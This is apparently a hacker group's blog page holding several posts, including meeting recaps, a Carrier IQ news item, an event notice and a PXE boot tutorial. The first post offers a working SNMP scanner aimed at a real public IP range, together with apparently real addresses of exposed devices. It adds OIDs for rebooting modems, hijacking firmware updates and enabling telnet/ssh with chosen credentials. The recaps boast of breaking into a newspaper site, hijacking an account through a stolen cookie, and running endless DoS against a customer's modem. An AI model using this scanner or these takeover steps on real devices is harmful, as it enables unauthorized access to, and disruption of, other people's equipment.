Good times with snmp

At the last meeting dw5304 gave a demo on snmp scanning and gaining access to things you shouldn’t have access to with a few home brew windows apps he coded up. Its been a while since I messed with snmp but his demo got me back into it, so I made a little python script to scan subnets for open snmp servers with the read/write string set to private. Here is the code:

#! /usr/bin/env python
import commands
from scapy.all import *

base = "69.2.1." #IP range to scan minus the last octet.
f = open('/tmp/snmp_output.txt', 'w+')
for i in range(1, 255):
ip = base+str(i)
print ip+"\n"
p = IP(dst=ip)/UDP(dport=161, sport=39445)/SNMP(community="private",PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1.0"))]))
pkt = sr1(p, timeout=1)
if pkt and pkt.sprintf("%IP.proto%") != "icmp":
p1 = pkt.sprintf("%SNMP.PDU%").split("ASN1_STRING['", 1)
p2 = p1[1].split("'", 1)
print pkt.sprintf("%IP.src%")+" - "+p2[0]
f.write(pkt.sprintf("%IP.src%")+" - "+p2[0]+"\n")
f.close()
print "\nDONE!!!!!!!!!!!!!!!\n"

Its a little hacked together and could use improvement but it works “feel free to send in any improvements you make”. It puts all the found servers IPs in /tmp/snmp_output.txt along with their system description enumerated via snmp. Here is a sample output:

69.1.117.87 - Ruckus Wireless Inc (C) 2006
69.1.117.156 - Ruckus Wireless Inc (C) 2006
69.1.117.190 - Ruckus Wireless Inc (C) 2006
69.1.117.193 - Ruckus Wireless Inc (C) 2006
69.1.117.203 - Ruckus Wireless Inc (C) 2006
69.1.117.221 - Ruckus Wireless Inc (C) 2006
69.1.163.92 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
69.1.163.93 - Product: GW 4 FXS;SW Version: 5.80A.023.006

Once you find a few servers you can do snmpwalks on them and scour it for juicy info.
Here are some good OIDs to look for and/or set: *found most of this online & got some from dw5304

ip.ipForwarding.0 <-this tells you if its forwarding packets or not "useful to DoS a device" 1.3.6.1.2.1.4.24.2.1.1 <-ipforwardingdest sysName.0 <-device name 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 i 1 ... EnableTelnetServer. 1.3.6.1.4.1.4413.2.2.2.1.1.1.1.0....telnetIpStackInterfaces. 1.3.6.1.4.1.4413.2.2.2.1.1.1.2.0....telnetUserName.. 1.3.6.1.4.1.4413.2.2.2.1.1.1.3.0....telnetPassword.. 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0....telnetServerControl. 1.3.6.1.4.1.4413.2.2.2.1.1.1.5.0....telnetSessionIp. 1.3.6.1.4.1.4413.2.2.2.1.1.1.6.0....telnetSessionInProgress. 1.3.6.1.4.1.4413.2.2.2.1.1.1.7.0....telnetForceUserLogout. 1.3.6.1.2.1.1.1.0 = System Description 1.3.6.1.2.1.1.3.0 = Modem up time 1.3.6.1.2.1.4 = Some useful information (walk) 1.3.6.1.2.1.4.20.1.1.0 = HFC IP (getnext) 1.3.6.1.2.1.4.20.1.3.0 = HFC Subnet (getnext) 1.3.6.1.2.1.2.2.1.6.2= Mac 1.3.6.1.2.1.10.127.1.1.3.1.3.1 = Maximum upload bandwidth 1.3.6.1.2.1.10.127.1.1.3.1.5.1 = Maximum download bandwidth 1.3.6.1.2.1.10.127.1.1.4.1 = Current status (walk) 1.3.6.1.2.1.17.4.3.1.1.0 = Hosts behind modem 1.3.6.1.2.1.69.1.4.4.0 = TFTP Configuration file server IP 1.3.6.1.2.1.69.1.4.5.0 = Configuration file name 1.3.6.1.2.1.69.1.3.5.0 = Current firmware 1.3.6.1.2.1.69.1.4.2.0 = DHCP Server IP 1.3.6.1.2.1.69.1.4.3.0 = Time Server IP 1.3.6.1.2.1.69.1.5.8.1.7 = View Log (walk) 1.3.6.1.2.1.10.127.1.1.1.1.2.3 = Downstream Frequency 1.3.6.1.2.1.69.1.4.5.0 = Image File 1.3.6.1.2.1.17.4.3.1.1 = Learned MAC (Get Next) ---[ Read / Write OIDs 1.3.6.1.2.1.69.1.1.3.0 = Boot modem (1=boot now) 1.3.6.1.2.1.69.1.3.1.0 = TFTP Firmware server IP 1.3.6.1.2.1.69.1.3.2.0 = Firmware filename 1.3.6.1.2.1.69.1.3.3.0 = Firmware update status (1=update now, 2=update on boot,3=disable updates) 1.3.6.1.2.1.69.1.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled) 1.3.6.1.2.1.69.1.5.3.0 = SNMP Traps status (1=enabled, 4=disabled) 1.3.6.1.4.1.1166.1.19.3.1.14.0 = SNMP Port 1.3.6.1.4.1.1166.1.19.3.1.15.0 = SNMP Traps port 1.3.6.1.4.1.1166.1.19.3.1.17.0 = HTML Server status (1=enabled, 2=disabled)Other OIDs 1.3.6.1.2.1.1.5.0 = modem type 1.3.6.1.3.83.1.1.4.0 = Cable Modem Serial Number 1.3.6.1.3.83.1.4.5.0 = Alternate OID for Config File 1.3.6.1.3.83.1.4.3.0 = Provisional Server 1.3.6.1.2.1.1.6.0 = Area String 1.3.6.1.2.1.4.20.1.3+(hfc ip) = Subnet Example 1.3.6.1.2.4.20.1.3.10.169.53.2451.3.6.1.3.103.1.5.1.3.1.5 = CPE USB MAC 1.3.6.1.2.1.2.2.1.6.1 = Cable Modem USB MAC 1.3.1.6.1.2.1.10.127.1.2.1.1.1.2 = Default Gateway MAC Address 1.3.6.1.2.1.2.10.127.1.1.3.1.6.1 = Max Burst Up 1.3.6.1.2.1.2.2.1.6.5 = CPE MAC 1.3.6.1.4.1.1166.1.19.3.1.17.0Ii 1 or 0 enable or disable webif 1.3.6.1.4.1.4413.2.2.2.1.1.4.1 =”reflects the IP stack interfaces on which a ssh 1.3.6.1.4.1.4413.2.2.2.1.1.4.2 = "reflects the user name which will be allowed ssh access." 1.3.6.1.4.1.4413.2.2.2.1.1.4.3 = "reflects the password which will be allowed ssh access." 1.3.6.1.4.1.4413.2.2.2.1.1.4.4 = "start or stop the ssh server. 1.3.6.1.4.1.4413.2.2.2.1.1.4.7 =terminate ssh session

You can find a lot more online. Enjoy and happy hacking 🙂

July meeting sweetness

July’s meeting was hot in more then one way! First I would like to thank genero again for his genorous donation for the raffle, which put a solid $200 in the 3d printer fund!! Also congrats to faraday for winning both the raffle and the Photoshop and WIN contest!! I know it took forever to pick a winner but we did it damnit 😛

ngharo started the demos off with talking about how he set up dc414’s new astrisk server using google voice as the SIP trunk! Then showed us how he set it up to use NMAP to scan IPs from asterisk and speak the results to you over the phone! Klaiviel took over and made Ngharo a case for his raspberry pi and a penny launcher with his sweet 3d printer. Then I stepped in and showed everyone how to send spoofed emails from the dc414 server using the email spoofer web app, then how to send spoofed txt messages using the same app 🙂 Then Tony used a SIP provider that allowed for spoofing CID to spoof a call to Vlad. Then dw5304 wowed us all with a SNMP scanner he made, showed us some of the results like accessing a routers, modems, and windmills!!

Here are some pics from the meeting thanx to cmoney and congrats to Castor for winning the dc414 free junk giveaway!

Here is Faraday with his raffle winnings!

Here is Castor and his free junk from dc414

Arduino Windows Attack Tool

A few meetings back I demoed my Arduino Windows attack tool. The Arduino and shield emulate a keyboard when plugged into a PC. Once triggered it opens the DOS edit program, writes some vbscript to a file called go.vbs, then runs it using wscript. The script downloads a payload from a web server. In the case of the demo it was a reverse shell that connects back to a nc listener from msf. I got the idea from the Social-Engineering Toolkit Teensy USB HID Attack but I dont have/want a teensy so I looked and looked for an Arduino version but all I could find was a USB keyboard lib, so my value add was porting it to the Arduino.

Here is the USB lib I used.

Here is the schematic for the shield: *I added a button on pin 12

Here is the code for the Arduino:

And there you have it, my Arduino Windows attack tool. Its a little messy and hacked together, but it works. Enjoy 🙂

Many thanx to SilkyPantsDan, Rancid Bacon, and Practical Arduino

May meeting recap.

May’s meeting was off the hook, one of our best yet! Lots of new faces which is always nice, good demos, and good beer. Ngharo started it off by talking about the hackathon and THOTCON. Klaiviel did his lock master thing and said a few words about TOOOL. Darkwind gave a awesome demo on sniffing pagers. Its crazy to see all the pager traffic that is still out there. Then I showed off my Arduino windows attack tool and pwned a windows 7 box, There will a blog post about that later. Congrats to Genero for winning the dc414 free junk giveaway! I did take a bunch of pictures but my phone was full of fail and didn’t save any of them 🙁 so no pictures of the meeting this time, sorry. I promise to do better next time 😛 later.

March meeting madness!

March’s meeting was filled with all sorts of shenanigans. dw5304 started things off with a little demo of Windows Server 8 and some of its improved features and functions.

Ngharo kept the OS ball rolling by going over some Linux 101 and while he was showing us how grep can be used to find wanted data in Apache logs Castor pulled a little prank on Ngharo and left a message in the logs for him 😛 Every one got a big laugh out of it. Ngharo also has promised to give a new Linux demo every meeting!

Then I stepped in and gave a demo on how to use temp XSS attacks to gain access to user accounts on web sites, the target in this case was Daily Motion using a known vector. It was complete with a explanation of the attack string, the payload, how to use it, and how to fix it. I gave the room the opportunity to hack my Daily Motion account, using the cookie stolen during my demo which turned out to be a bad idea, Ngharo thought it was cute to replace my profile picture with the index picture from lemonparty2 😐 Yeah, ok I loled hard at that one 🙂

Then The Professor showed us how to use “The Social Engineering Tool Kit” to phish n00bs and pwn their passwords! He gave us a step by step of how to copy a website, how to access the phish page, and what happens when its used. Then we all talked about how to know when your being phished. It was a great first demo from The Professor.

A big congrats to The Professor for winning the dc414 Free Junk Giveaway “pic below”, Enjoy your new Launchpad 🙂 Here are some other pictures from the awesome Cmoney.

The big winner:

SIDE NOTE:
The next morning with a slight hangover I open my email and find this from Daily Motion:
Hello anarchyang31,

The avatar of your Dailymotion account “anarchyang31” has been deleted due to non respect of the General Terms Of Use (inappropriate content).
In any event, we ask that you observe those conditions. You can review them by clicking here: http://www.dailymotion.com/legal/terms

After 5 deleted avatars, you will no longer be able to change it and it will be replaced with a default avatar.

You can upload a new avatar by clicking here: http://www.dailymotion.com/profile/avatar

Best regards,


The Dailymotion Team

LMAO thanx Ngharo. Ok thats it, later.

First 2012 meeting recap

January’s meeting had a few kinks but all in all everything went well and we had a few new faces in the crowd. We had some issues with the G+ hangout, but it was our first time and i’m sure it will go smoother the second time around. Then i had video issues while trying to give my LFI attacks demo and had to give a backup demo, but everyone else was awesome.

Darkwind gave his first presentation with dc414 and it was a good one for sure. He showed us some of his modded radio equipment and how to decode all sorts of transmissions, from HAM faxes, pagers, DTMF tones and more being broadcast in the air ways. Talked a little about cell tower emulators and software radios. dw5304 and Klaiviel gave us a run down of how they hacked the new xbox 360 to play ripped games off the HDD in just a few not so easy steps 😛 Then dw5304 have a little demo on resetting passwords on any windows box with just a few key strokes. I gave the last presentation of the night and after my LFI demo fail i was able to give a nice little demo of how the ODiG tool works and how it can aid in pwning networks.

One of the coolest things about the meeting, it was our honor to have Jayson Street join us via G+. We hope to see him at the next meeting. Cmoney couldn’t join us but I was able to snap a few shots here and there which you can view here. The big winner of free dc414 junk was Stephanie, here she is with her winnings: “ALFA usb 802.11n card”
Stephanie and her winnings

December meeting recap

Decembers meeting was awesome! Vlad gave a great in depth wi-spy demo. He showed us what a Bluetooth file transfer looks like, what microwaves look like and access points looks like, and gave good detail of just what exactly was going on. Before the meeting he asked people to bring in any wireless devices to see what they looked like in wi-spy while operating. dw5304 came packing with a some directional wireless access points, one so powerful it completely took over the entire spectrum that wi-spy displays.

Then i gave my presentation on using sql injections to bypass logins to sites and admin areas. I showed what should be sent to the sql server, how it looks in php and how to identify exploits. Then showed what a sql injection looks like when passed to the server. I didn’t stop there, we broke into gmtoday.com to take a look at the news paper, then used a google dork to pwn a few more logins. I also talked about dc414’s new badge program project, more on this later, and announced dc414’s new year eve party! More on this later as well.

dw5304 finished off the presentations with a killer demonstration of just how weak time warners security is. He showed us how to take complete control of one of their cable modems with just a few requests, even how to build your own private proxy network made out of time warner modems! Then to top it off demoed a never ending DoS on a modem, kicking this client off line for as long as he wished!

Other then the normal junk i bring to give away, ngharo donated a portable dvd player for cars and F4r4d4y donated a arduino “thanx guys”. All of which went to a good home. Here are some pics cmoney took at the meeting “thanx cmoney”, and a big congrats to Castor for winning the anti-M$ poster and pantsme on snagging the arduino!

Castor and his winnings:

rootkit hidden in millions of cellphones

Another email just surfaced …

rootkit hidden in millions of cellphones

Rootkit found in Android, Symbian, BlackBerry, webOS and even iOS handsets …. but not windows phone’s

The rootkit belongs to a company called Carrier IQ and it seems that it has low-level access to the system that allows it to spy on pretty much everything that you do with your handset. This, on the face of it, seems like an extremely serious breach of security, privacy and trust.

The capabilities of the rootkit were first discovered by 25-year-old Trevor Eckhart.

Here’s a video showing how everything, including text messages and encrypted web searches, are being logged. It’s truly horrifying.

NOTE: At this point there is no evidence to suggest that keystroke data is being transmitted from the handset.

According to Carrier IQ the company is ‘not recording keystrokes or providing tracking tools.’ The video above seems to suggest otherwise.

When Eckhart initially labeled the software as a rootkit, Carrier IQ threatened him with legal action. Only when the Electronic Frontier Foundation stepped in did the company back off from this threat.

“Every button you press in the dialer before you call,” Eckhart says on the video, “it already gets sent off to the IQ application.”

Like I said earlier, there’s a version of Carrier IQ on Apple’s iOS, but it doesn’t seem to be quite the same and doesn’t seem to access as much information. Also, if you want to disable Carrier IQ on your iOS 5 device, turning off Diagnostics and Usage under Settings seems to be enough.

You might have noticed that I didn’t list Windows Phone 7 OS earlier. That’s because it seems that Windows Phone handsets don’t have Carrier IQ installed.

Here’s a video that explains some more about Carrier IQ. This video also contains a clip from a video by Carrier IQ’s vice president of marketing explaining how the company sees this as being completely legal.

 

[UPDATE: According to a statement from Apple to AllThingsD, Apple stopped supporting Carrier IQ with iOS 5.0:

“We stopped supporting Carrier IQ with iOS 5 in most of our products and will remove it completely in a future software update. With any diagnostic data sent to Apple, customers must actively opt-in to share this information, and if they do, the data is sent in an anonymous and encrypted form and does not include any personal information. We never recorded keystrokes, messages or any other personal information for diagnostic data and have no plans to ever do so.”

When begs the question … what’s collecting all the information on the iPhone? Is this a mechanism developed by Apple for Apple?]

Bit shocked that your iPhone has that Carrier IQ logging feature built into the OS? You can switch it off … in fact, I’ve shown you how to do this before!

Here’s how!

Buried in the Settings menu is an option to choose not to send what Apple calls ‘diagnostic and usage data.’ This option is buried real deep:

Settings > General > About > Diagnostics & Usage

Here’s the screen you’re looking for:

Set this to Don’t Send and you can stop worrying about where your data is going and who’s looking at it.

Note that this feature is only present on handsets running iOS 5.0 or later (so the iPhone 4S and upgraded iPhone 4 and 3GS handsets.

Microsoft Virtualization Event in Brookfield

Just got an email from Microsoft saying they have a virtualization event in brookefield.

Figured since I was going I’d share in case anyone else wants to join me.  Should be worth while.

Starts: Thursday, December 08, 2011 9:00 AM
Ends: Thursday, December 08, 2011 5:00 PM
Time zone: (GMT-06:00) Central Time (US & Canada)

“Sheraton Milwaukee Brookfield

375 S Moorland Rd
Brookfield Wisconsin 53005
United States

 

Register by Phone: 1-877-MSEVENT 9AM-7PM EST M-F
Meal: Yes
Presenter(s):  Brian Lewis and Matt Hester.
Language(s):  English.
Product(s):  Microsoft System Center Virtual Machine Manager, Windows Azure, Windows Server and Windows Server 2008 R2.
Audience(s):  IT Generalist.”or register here

PXE Boot Primer for Windows

by dw5304 AT dc414.org

PXE Boot Primer: Part One

We are creating a network boot environment for installing OS and running diagnostic utilities.

Configure your DHCP server

I chose dd-wrt because of its ability to set the DHCP options for the next-server and bootp options easily.  For a list of supported dd-wrt routers see here.  You can do this from Windows server, Linux, or any other DHCP server that support BootP as well.

If you have issues getting dd-wrt to install please read the information that’s listed on their site for setup.  Log into your router, in my case its 10.10.1.1, click on services tab and in the additional dnsmaq options place the following where 10.10.1.5 is going to be your TFTP server.

Additional DNSMasq Options:
dhcp-boot=pxelinux.0,, 10.10.1.5


Make sure to hit apply settings and lets continue installing our TFTP server

Configure your TFTP Server

I am using tftpd for Window: 32bit install, 64bit install.

If we are running Windows we should add tftpd service to the firewall exception list.  You can allow a program through the firewall via Control Panel.

Open Ttpd settings and  remove all items except for tftp_server and tftp_client, then lets click the tab for tftp set security to none (TFTPd is not an encrypted channel.  You should be using firewall ACLs to limit access to the server).   Check the box for Option negotiation, Translate Unix file names , and Allow virtual \ .  Everything else should be unchecked.


tftpd options

Create a TFTP root directory.  In my case I chose C:\tftp-root\.  Extract the boot files into this directory.  Download files here.

Windows Automated Installation

Download the Windows AIK.  Burn the image to a disc or mount the ISO and run the Windows AIK setup. You can just hit next though the whole setup process.

Windows AIK Setup

Now click on Deployment Tools Command Prompt shortcut on desktop or in your start menu.  Now run “copype.cmd Arch C:\DESTINATION” (where ARCH = x86 (32bit), amd64 (64bit), ia64 (Itanium) and DESTINATION is where you’d like the output the data files for the image we will be creating to reside.)

copype.cmd ARCH C:\DESTINATION
Dumping a x86 image to c:\winpe_x86

Bootloader

Mount the image that was created for us.  Make sure to replace winpe_x86 with your destination used in the previous step.

imagex /mountrw c:\winpe_x86\winpe.wim 1 c:\winpe_x86\mount

Copy the files for PXE boot to the tftp-root \boot folder.

copy mount\Windows\Boot\PXE\*.* C:\TFTP-Root\Boot

Copy boot.sdi from AIK to the TFTP folder.

copy "c:\Program Files\Windows AIK\Tools\PETools\x86\boot\boot.sdi" C:\TFTP-Root\Boot

Copy pxeboot.n12 to pxeboot.0 so it will work with our syslinux bootloader.  Syslinux only seems to take *.0 file extension.

copy c:\TFTP-Root\Boot\pxeboot.n12 c:\TFTP-Root\Boot\pxeboot.0

Next copy bootmgr.exe to the root of the tftp-root folder

copy c:\TFTP-Root\Boot\bootmgr.exe c:\TFTP-Root\

Windows might complain if it can’t find boot.ini in the TFTP root, so let’s create it.

echo > C:\TFTP-Root\boot.ini

We need to create the BCD (Boot Configuration Data) for the PXE environment to load the WIM (Windows Install Media)  file’s (this is a great line to use on chicks).  Note: I found following Microsoft’s instructions for this step resulted in fail.

bcdedit -createstore C:\winpe_x86\BCD
Bcdedit /store c:\winpe_x86\BCD -create {ramdiskoptions}
Bcdedit /store c:\winpe_x86\BCD -set {ramdiskoptions} ramdisksdidevice boot
Bcdedit /store c:\winpe_x86\BCD -set {ramdiskoptions} ramdisksdipath \boot\boot.sdi
Bcdedit /store c:\winpe_x86\BCD -create /d "Windows 32bit installers" /application osloader

If this is all proper it will return a GUID.  We need this in order to create a boot entry.

BCD Setup

Now that we have our guid for the windows 32bit installers we need to tell it what to do. If you want to also create a 64bit  osloader run the last command again to create a new guid. (Bcdedit /store c:\winpe_x86\BCD -create /d “Windows 64bit installers” /application osloader) with a different description aka “windows 64bit installers”. Replace {guid1} with the guid of your bcd entry mine is {3e04a3b3-dcdf-11e0-894c-d1514d26a539}.Your bcd guid will be different. Make sure to include the {}. If u want to use a different wim file please also update it accordingly.

Bcdedit /store c:\winpe_x86\BCD -set {guid1} systemroot \Windows
Bcdedit /store c:\winpe_x86\BCD -set {guid1} detecthal Yes
Bcdedit /store c:\winpe_x86\BCD -set {guid1} winpe Yes
Bcdedit /store c:\winpe_x86\BCD -set {guid1} osdevice ramdisk=[boot]\Boot\winpex86.wim,{ramdiskoptions}
Bcdedit /store c:\winpe_x86\BCD -set {guid1} device ramdisk=[boot]\Boot\winpex86.wim,{ramdiskoptions}

Now I’m going to add an x64 entry for my boot environment you can skip this setup if u wish.

bcdedit /store c:\winpe_x86\BCD -create /d "Windows 64bit Installers" /application osloader
Bcdedit /store c:\winpe_x86\BCD -set {guid2} systemroot \Windows
Bcdedit /store c:\winpe_x86\BCD -set {guid2} detecthal Yes
Bcdedit /store c:\winpe_x86\BCD -set {guid2} winpe Yes
Bcdedit /store c:\winpe_x86\BCD -set {guid2} osdevice ramdisk=[boot]\Boot\winpex64.wim,{ramdiskoptions}
Bcdedit /store c:\winpe_x86\BCD -set {guid2} device ramdisk=[boot]\Boot\winpex64.wim,{ramdiskoptions}

now we need to create the bootmgr settings. I set my time out to 99999 you can shorten this if u want.

Bcdedit /store c:\winpe_x86\BCD -create {bootmgr} /d "Windows Pe BootManager"
Bcdedit /store c:\winpe_x86\BCD -set {bootmgr} timeout 99999
Bcdedit /store c:\winpe_x86\BCD /displayorder {guid1} {guid2}

Now copy bcd to tftp root\Boot folder by copy C:\winpe_x86\BCD C:\TFTP-Root\Boot

We should now be able to test to make sure everything works in terms of bcd. Start up a new computer, and tell it to boot from the pxe environment. Then hit enter when the syslinux menu show up.

we can see it works! Good job. Now we need to create wim files and the rest of the scripting.

Lets edit the winpe_x86 image we mounted earlier.
We want to edit and make changes to windows\system32\startnet.cmd ( this file is the first thing the WIM file runs. It basically sets up drivers and network access.)

and make it say

wpeinit
main.cmd
W:\scripts\main.cmd

now make a new file in the mount\windows\system32\ called main.cmd
echo >mount\windows\system32\main.cmd

next edit main.cmd and make it say

@echo off
echo mapping drive.
echo trying dc414 pxe setup
net use W: \\ip_or_host\win
echo example of second network try
net use W: \\ip_or_host\win
echo starting main.cmd
W:\scripts\main.cmd

Replace ip_or_host with an ip address or host name. If you have more than one network in your setup you can add another ip or host for the other network. Just do another net use command.

Installing network drivers:
we will go and download the network driver packs from http://driverpacks.net/driverpacks/latest
make sure you download the proper x64 or x86 drivers ( you will need a torrent client to do this). Extract the files to a temp dir in side of the win_x86 folder\drivers now we want to recursively add all the drivers from this driver pack.

Now we add all the drivers recursively into the package.
Dism /Image:C:\winpe_x86\mount /Add-Driver /Driver:c:\winpe_x86\drivers /Recurse

After you get done modifying this image your done with this wim and we need to commit the changes.
imagex /unmount /commit C:\winpe_x86\mount

Now lets copy this wim to our tftp-root\Boot folder
copy winpe.wim C:\TFTP-Root\Boot\winpex86.wim
Lets see if our Wim file we just created boots and works as expected.

It dose we have successfully gotten our wim file to boot. Now we need to setup the share on the windows workstation. Inside the tftp-root folder there is a folder called “win” we need to share this folder with access to everyone.  If  this is not done you need to specify a user name and a password inside your net use command in the wim image.

Now we need to add our windows installations  to this win folder and update the choice menu that boots from the network share…

All that’s needed is the setup.exe and the sources folder that contains the install.wim you can delete boot.wim to save space.

Example of my setup. For win32 entry. Win64 I just change it say 64 instead of 32 and when a new sp comes out I usually add the number to the folder.

When the system boot it runs main32.cmd or main64.cmd (from tftp-root\win\scripts\)depending on what was put in earlier for main.cmd on the wim file. then calls install32.cmd or install64.cmd. These two files contains the menu system for the installer your operating systems. Along with these batch scripts there is also choise64.exe and choise32.exe they run bases on the install script you are running seeing the x86 and the x64 do not include the subsystem that supports each other… you will see a subsystem not support cause of the exe that runs and switches the window… (cmdow.exe) some antiviruses will see this as a virus and will delete it. Its safe, its being detected because of that it dose. It hides the command line window and brings up the setup exe in front of the cmd window that’s open…
To add or edit more entries into the install32.cmd or install64.cmd just add an , and the next number them make an entry for that option.

Now if you want x64 do the same thing but replace all instances of x86 with x64 or 32 with 64.
And then copy the winpe.wim to winpex64.wim to the C:\tftp-root\Boot folder. If we want to boot to an iso for other diagnostic tools we need to add entries to C:\tftp-root\pxelinux.cfg\default its easiest to add a menu to go to another menu to make it easier and cleaner. Place a new file in the c:\tftp-boot\menu folder usaly I make them end w/ a .cfg so u can edit them menu system. For instance lets add a menu system to give us options to run a hdd test.

Open C:\tftp-root\pxelinux.cfg\default

now lets add an entry for this hdd diag tool.

LABEL HDDtools
Menu LABEL Hard Drive Testing Tools
kernel vesamenu.c32
append menu/hdd.cfg
TEXT HELP
Hard Drive Diagnostic Tools
ENDTEXT

Now we need to make a file called hdd.cfg in side the menu folder and make it boot our images. Place all these files inside the util folder for img and other image files and place iso in side of the iso folder. Link to them accordingly.

Contents of hdd.cfg

if we want to boot an iso we want to do a
LABEL AcronisDiskDirector
LINUX memdisk
APPEND iso
INITRD iso/Adds.iso

We can also boot basically anything we want just need to create a menu system. That will take us there. We can also add a password to the menu system if we don’t want someone to get access to certain things.

MENU PASSWD passwd
(Only valid after a LABEL statement, or a MENU BEGIN statement.)
Sets a password on this menu entry. "passwd" can be either a cleartext password, a SHA-1 encrypted password (starting with $4$), or and MD5 encrypted password (starting with $1$).
You can protect an entire submenu by using "MENU PASSWD" after the submenu's "MENU BEGIN."
Use the included Perl scripts "sha1pass" or "md5pass" to encrypt passwords. MD5 passwords are compatible with most Unix password file utilities; SHA-1 passwords are probably unique to SYSLINUX. Obviously, if you don't encrypt your passwords they will not be very secure at all.
If you are using passwords, you want to make sure you also use the settings "NOESCAPE 1", "PROMPT 0", and either set "ALLOWOPTIONS 0" or use a master password (see below.)
If passwd is an empty string, this menu entry can only be unlocked with the master password.

MENU MASTER PASSWD passwd
Sets a master password. This password can be used to boot any menu entry, and is required for the [Tab] and [Esc] keys to work.

To generate a password use openssl passwd -1 mypassword

Example:

In my case its test

Trouble shooting:
If you get an unmountable boot volume its cause there is no ramdisk options in your bcd config please reread the instructions on how to setup bcd.

Network card is not detected in pxe env. Go to manufactures website and download there network card driver, and run the add driver commands.

If you get a ip fragment please open up your registery and goto [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\guid for my network card
and setting MTU to 1492 and rebooting the system once you do that error should resolve its self.
If you get a gray screen on the syslinux menu its problem because the name was spelled wrong. Check the tftp log and correct spelling if it is the case.